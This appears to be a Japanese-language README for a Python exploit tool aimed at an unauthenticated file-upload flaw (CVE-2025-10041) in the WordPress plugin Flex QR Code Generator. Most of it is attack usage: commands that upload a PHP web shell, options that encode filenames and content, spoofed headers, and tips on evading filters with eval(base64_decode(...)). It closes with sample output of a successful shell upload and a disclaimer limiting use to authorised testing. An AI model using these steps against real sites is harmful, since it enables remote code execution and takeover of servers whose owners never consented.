
Flex QR Code Generator <= 1.2.5 - 未認証の任意ファイルアップロード
WordPress 用プラグイン Flex QR Code Generator は、save_qr_code_to_db() 関数におけるファイルタイプ検証の欠如により、1.2.5 を含む全バージョンで任意ファイルアップロードの脆弱性があります。
これにより、未認証の攻撃者が影響を受けるサイトのサーバーに悪意のあるファイルをアップロードでき、リモートコード実行につながる可能性があります。
CVE-2025-100419.8 (Critical)CVE-2025-10041.py は、この脆弱性を利用して攻撃を自動化するために設計されたプロフェッショナルなエクスプロイトツールです。
一般的な保護のバイパスとエンコード技術のための高度な機能を提供します。
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
利用可能なすべてのオプションと使用手順を確認するには:
python3 CVE-2025-10041.py --help
.php や不審な名前をブロックします。エンコードによりフィルターを回避できる可能性があります。eval(base64_decode(...)) でラップすると、コンテンツフィルターをバイパスできる可能性があります。Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
このスクリプトは教育、研究、および許可を得たペネトレーションテストの目的のみで提供されます。
自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、固く禁止されており違法です。
著者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。
Nxploited (Khaled Alenazi)